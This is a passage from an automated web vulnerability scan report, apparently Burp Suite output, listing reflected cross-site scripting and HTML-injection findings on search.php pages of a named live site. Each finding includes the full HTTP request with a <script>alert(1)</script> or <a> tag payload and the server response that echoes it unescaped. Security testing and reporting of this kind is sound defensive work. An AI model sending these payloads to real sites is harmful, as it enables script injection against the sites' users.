GET /detail/5/themes/kosmos/images/review/search.php8ee05<script>alert(1)</script>62db1521266?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/review/search.php8ee05<script>alert(1)</script>62db1521266?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3432. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 1f0f9<a>17ed3e55dbd was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search1f0f9<a>17ed3e55dbd&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search1f0f9<a>17ed3e55dbd&opt=2 was not found on this server.</p>
...[SNIP]...

2.3433. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 9afee<a>5a4fa8ac423 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/images/review/search.php?keyword=search...9afee<a>5a4fa8ac423&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/review/search.php?keyword=search...9afee<a>5a4fa8ac423&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3434. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 95f59<script>alert(1)</script>9174f54120e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&95f59<script>alert(1)</script>9174f54120e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&95f59<script>alert(1)</script>9174f54120e=1 was not found on this server.</p>
...[SNIP]...

2.3435. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload f24c1<a>7fb4d89da9e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2f24c1<a>7fb4d89da9e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2f24c1<a>7fb4d89da9e was not found on this server.</p>
...[SNIP]...

2.3436. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload df53e<script>alert(1)</script>67c4b418ec8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildf53e<script>alert(1)</script>67c4b418ec8/5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildf53e<script>alert(1)</script>67c4b418ec8/5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3437. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f5c14<script>alert(1)</script>f6967ffbd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5f5c14<script>alert(1)</script>f6967ffbd3/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5f5c14<script>alert(1)</script>f6967ffbd3/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3438. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5f322<script>alert(1)</script>b80a6aa9ece was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes5f322<script>alert(1)</script>b80a6aa9ece/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes5f322<script>alert(1)</script>b80a6aa9ece/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3439. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a2198<script>alert(1)</script>e5611b17a2e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmosa2198<script>alert(1)</script>e5611b17a2e/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmosa2198<script>alert(1)</script>e5611b17a2e/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3440. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 69057<script>alert(1)</script>2480add24c4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images69057<script>alert(1)</script>2480add24c4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images69057<script>alert(1)</script>2480add24c4/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3441. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 73669<script>alert(1)</script>92886b017d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/search.php73669<script>alert(1)</script>92886b017d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/search.php73669<script>alert(1)</script>92886b017d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3442. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7f495<a>b7170e0140c was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search7f495<a>b7170e0140c&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search7f495<a>b7170e0140c&opt=2 was not found on this server.</p>
...[SNIP]...

2.3443. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 9a7d8<a>7ceb0bca802 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/images/search.php?keyword=search...9a7d8<a>7ceb0bca802&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/search.php?keyword=search...9a7d8<a>7ceb0bca802&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3444. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 831ea<script>alert(1)</script>263bc02cb2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&831ea<script>alert(1)</script>263bc02cb2e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&831ea<script>alert(1)</script>263bc02cb2e=1 was not found on this server.</p>
...[SNIP]...

2.3445. http://www.resellerbase.com/detail/5/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 95ab5<a>c501ccfe91e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=295ab5<a>c501ccfe91e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=295ab5<a>c501ccfe91e was not found on this server.</p>
...[SNIP]...

2.3446. http://www.resellerbase.com/detail/5/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 372cf<script>alert(1)</script>3d4455adbf8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail372cf<script>alert(1)</script>3d4455adbf8/5/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail372cf<script>alert(1)</script>3d4455adbf8/5/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3447. http://www.resellerbase.com/detail/5/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b6cbf<script>alert(1)</script>72940385d0a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5b6cbf<script>alert(1)</script>72940385d0a/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5b6cbf<script>alert(1)</script>72940385d0a/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3448. http://www.resellerbase.com/detail/5/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b225d<script>alert(1)</script>00b6de66bcb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themesb225d<script>alert(1)</script>00b6de66bcb/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
